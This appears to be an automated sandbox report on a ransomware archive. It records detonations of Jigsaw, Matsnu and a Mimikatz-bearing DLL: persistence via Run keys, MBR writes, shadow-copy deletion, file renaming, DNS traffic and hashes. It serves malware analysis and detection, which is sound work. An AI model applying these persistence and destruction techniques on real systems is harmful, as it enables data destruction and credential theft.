Malware Analysis Report

2025-01-02 14:50

Sample ID 241128-2kfzcsyphk
Target Ransomware-master.zip
SHA256 3e2ba9a25e9891c6dcb75ad73c1262d523e09f0eb3d095ede9ea9d11f42ebc28
Tags
jigsaw persistence ransomware spyware stealer discovery mimikatz bootkit cerber evasion privilege_escalation defense_evasion execution impact locky upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3e2ba9a25e9891c6dcb75ad73c1262d523e09f0eb3d095ede9ea9d11f42ebc28

Threat Level: Known bad

The file Ransomware-master.zip was found to be: Known bad.

Malicious Activity Summary

jigsaw persistence ransomware spyware stealer discovery mimikatz bootkit cerber evasion privilege_escalation defense_evasion execution impact locky upx

Jigsaw Ransomware

Locky

Jigsaw family

Mimikatz family

Locky family

Cerber family

Mimikatz

Cerber

Renames multiple (2014) files with added filename extension

Renames multiple (3755) files with added filename extension

Deletes shadow copies

mimikatz is an open source tool to dump credentials on Windows

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Contacts a large (1097) amount of remote hosts

Modifies Windows Firewall

Contacts a large (1100) amount of remote hosts

Deletes itself

Drops startup file

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Writes to the Master Boot Record (MBR)

Drops desktop.ini file(s)

Adds Run key to start application

Looks up external IP address via web service

Sets desktop wallpaper using registry

Suspicious use of SetThreadContext

UPX packed file

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Suspicious use of SetWindowsHookEx

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of UnmapMainImage

Uses Volume Shadow Copy service COM API

Scheduled Task/Job: Scheduled Task

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 22:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240729-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Jigsaw family

jigsaw

Renames multiple (2014) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\7-Zip\Lang\ko.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewSelectionChanged.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\validation.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sq.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_m.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Country.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageBlank.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\slideshow_glass_frame.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_VelvetRose.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\7-Zip\Lang\ro.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.bmp C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\js\calendar.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Network

N/A

Files

memory/1072-0-0x000007FEF5BAE000-0x000007FEF5BAF000-memory.dmp

memory/1072-1-0x0000000000300000-0x0000000000338000-memory.dmp

memory/1072-2-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/1072-3-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/1072-10-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2744-11-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2744-12-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2744-13-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2744-14-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\container.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

memory/2744-2036-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2744-2039-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3124 -ip 3124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 368

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240729-en

Max time kernel

149s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EE55.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REMOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
